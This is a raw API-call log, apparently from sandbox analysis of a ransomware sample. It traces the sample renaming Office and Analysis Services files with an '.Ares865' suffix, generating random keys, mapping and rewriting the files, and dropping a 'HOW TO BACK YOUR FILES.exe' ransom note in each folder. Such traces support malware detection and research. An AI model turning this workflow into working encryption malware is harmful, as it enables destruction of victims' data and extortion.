[0130.460] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL.Ares865") returned 73 [0130.460] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll.ares865"), dwFlags=0x1) returned 1 [0130.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVSUI.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.464] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17808) returned 1 [0130.464] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.465] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4890, lpName=0x0) returned 0x170 [0130.467] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4890) returned 0x190000 [0130.468] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.469] lstrcpyW (in: lpString1=0x2cce46c, lpString2="VBAOWS10.CHM" | out: lpString1="VBAOWS10.CHM") returned="VBAOWS10.CHM" [0130.470] lstrlenW (lpString="VBAOWS10.CHM") returned 12 [0130.470] lstrlenW (lpString="Ares865") returned 7 [0130.470] lstrcmpiW (lpString1="S10.CHM", lpString2="Ares865") returned 1 [0130.470] lstrlenW (lpString=".dll") returned 4 [0130.470] lstrcmpiW (lpString1="VBAOWS10.CHM", lpString2=".dll") returned 1 [0130.470] lstrlenW (lpString=".lnk") returned 4 [0130.470] lstrcmpiW (lpString1="VBAOWS10.CHM", lpString2=".lnk") returned 1 [0130.470] lstrlenW (lpString=".ini") returned 4 [0130.470] lstrcmpiW (lpString1="VBAOWS10.CHM", lpString2=".ini") returned 1 [0130.470] lstrlenW (lpString=".sys") returned 4 [0130.470] lstrcmpiW (lpString1="VBAOWS10.CHM", lpString2=".sys") returned 1 [0130.470] lstrlenW (lpString="VBAOWS10.CHM") returned 12 [0130.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM.Ares865") returned 74 [0130.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vbaows10.chm"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vbaows10.chm.ares865"), dwFlags=0x1) returned 1 [0130.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VBAOWS10.CHM.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vbaows10.chm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=266741) returned 1 [0130.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.473] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x41500, lpName=0x0) returned 0x170 [0130.475] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41500) returned 0x420000 [0130.486] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.487] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.487] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.491] lstrcpyW (in: lpString1=0x2cce46c, lpString2="VVIEWRES.DLL" | out: lpString1="VVIEWRES.DLL") returned="VVIEWRES.DLL" [0130.491] lstrlenW (lpString="VVIEWRES.DLL") returned 12 [0130.491] lstrlenW (lpString="Ares865") returned 7 [0130.491] lstrcmpiW (lpString1="RES.DLL", lpString2="Ares865") returned 1 [0130.491] lstrlenW (lpString=".dll") returned 4 [0130.491] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2=".dll") returned 1 [0130.491] lstrlenW (lpString=".lnk") returned 4 [0130.491] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2=".lnk") returned 1 [0130.491] lstrlenW (lpString=".ini") returned 4 [0130.491] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2=".ini") returned 1 [0130.491] lstrlenW (lpString=".sys") returned 4 [0130.491] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2=".sys") returned 1 [0130.491] lstrlenW (lpString="VVIEWRES.DLL") returned 12 [0130.491] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL.Ares865") returned 74 [0130.491] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll.ares865"), dwFlags=0x1) returned 1 [0130.493] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\VVIEWRES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\vviewres.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=667520) returned 1 [0130.493] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.494] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.494] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.494] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa3280, lpName=0x0) returned 0x170 [0130.496] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa3280) returned 0xdd0000 [0130.540] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.541] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.541] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.550] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services") returned="C:\\Program Files (x86)\\Microsoft Analysis Services" [0130.551] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services") returned="C:\\Program Files (x86)\\Microsoft Analysis Services" [0130.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0130.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\how to back your files.exe"), bFailIfExists=1) returned 0 [0130.552] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0130.553] GetLastError () returned 0x0 [0130.553] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0130.553] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528d8a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0130.554] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0130.554] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0130.554] lstrcpyW (in: lpString1=0x2cce466, lpString2="AS OLEDB" | out: lpString1="AS OLEDB") returned="AS OLEDB" [0130.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0130.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1708 [0130.554] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0130.554] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d8a00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0130.554] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0130.554] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d8a00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0130.554] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0130.554] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7970 [0130.554] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB" [0130.554] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB" [0130.554] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0130.554] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0130.555] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0130.556] GetLastError () returned 0x0 [0130.556] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0130.556] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528d8a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0130.556] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0130.556] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0130.556] lstrcpyW (in: lpString1=0x2cce478, lpString2="10" | out: lpString1="10") returned="10" [0130.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0130.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f00d8 [0130.556] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0130.556] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d8a00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0130.556] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0130.556] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d8a00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528d8a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0130.556] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0130.557] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7970 [0130.557] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10" [0130.557] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10" [0130.557] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0130.557] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\how to back your files.exe"), bFailIfExists=1) returned 0 [0130.558] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0130.558] GetLastError () returned 0x0 [0130.558] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0130.558] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528feb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0130.559] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0130.559] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0130.559] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Cartridges" | out: lpString1="Cartridges") returned="Cartridges" [0130.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0130.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x31afc8 [0130.559] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0130.559] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528feb60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x528feb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0130.559] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0130.559] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150a6b00, ftCreationTime.dwHighDateTime=0x1ca2c5f, ftLastAccessTime.dwLowDateTime=0x516cf9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x150a6b00, ftLastWriteTime.dwHighDateTime=0x1ca2c5f, nFileSizeHigh=0x0, nFileSizeLow=0x1663968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0130.559] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0130.559] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="aoldtz.exe") returned 1 [0130.559] lstrcpyW (in: lpString1=0x2cce47e, lpString2="msmdlocal.dll" | out: lpString1="msmdlocal.dll") returned="msmdlocal.dll" [0130.559] lstrlenW (lpString="msmdlocal.dll") returned 13 [0130.559] lstrlenW (lpString="Ares865") returned 7 [0130.559] lstrcmpiW (lpString1="cal.dll", lpString2="Ares865") returned 1 [0130.559] lstrlenW (lpString=".dll") returned 4 [0130.559] lstrcmpiW (lpString1="msmdlocal.dll", lpString2=".dll") returned 1 [0130.559] lstrlenW (lpString=".lnk") returned 4 [0130.559] lstrcmpiW (lpString1="msmdlocal.dll", lpString2=".lnk") returned 1 [0130.559] lstrlenW (lpString=".ini") returned 4 [0130.559] lstrcmpiW (lpString1="msmdlocal.dll", lpString2=".ini") returned 1 [0130.559] lstrlenW (lpString=".sys") returned 4 [0130.559] lstrcmpiW (lpString1="msmdlocal.dll", lpString2=".sys") returned 1 [0130.560] lstrlenW (lpString="msmdlocal.dll") returned 13 [0130.560] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.Ares865") returned 84 [0130.560] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.ares865"), dwFlags=0x1) returned 1 [0130.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23476584) returned 1 [0130.563] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.564] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.564] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.564] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1663c70, lpName=0x0) returned 0x170 [0130.566] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1600000, dwNumberOfBytesToMap=0x63c70) returned 0x420000 [0130.836] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.837] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.837] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.851] lstrcpyW (in: lpString1=0x2cce47e, lpString2="msmgdsrv.dll" | out: lpString1="msmgdsrv.dll") returned="msmgdsrv.dll" [0130.851] lstrlenW (lpString="msmgdsrv.dll") returned 12 [0130.851] lstrlenW (lpString="Ares865") returned 7 [0130.851] lstrcmpiW (lpString1="srv.dll", lpString2="Ares865") returned 1 [0130.851] lstrlenW (lpString=".dll") returned 4 [0130.851] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2=".dll") returned 1 [0130.851] lstrlenW (lpString=".lnk") returned 4 [0130.851] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2=".lnk") returned 1 [0130.851] lstrlenW (lpString=".ini") returned 4 [0130.851] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2=".ini") returned 1 [0130.851] lstrlenW (lpString=".sys") returned 4 [0130.851] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2=".sys") returned 1 [0130.851] lstrlenW (lpString="msmgdsrv.dll") returned 12 [0130.851] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.Ares865") returned 83 [0130.851] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.ares865"), dwFlags=0x1) returned 1 [0130.862] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8567128) returned 1 [0130.863] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.864] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.864] CryptReleaseContext 